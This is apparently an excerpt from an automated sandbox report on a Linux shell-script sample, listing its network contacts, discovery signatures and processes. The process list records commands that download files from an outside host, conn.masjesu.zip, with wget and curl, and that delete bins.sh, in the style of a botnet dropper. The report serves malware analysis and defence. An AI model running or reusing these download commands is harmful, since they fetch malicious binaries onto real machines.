GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 01:27

Reported

2024-11-24 01:30

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

29s

Command Line

[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh

[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A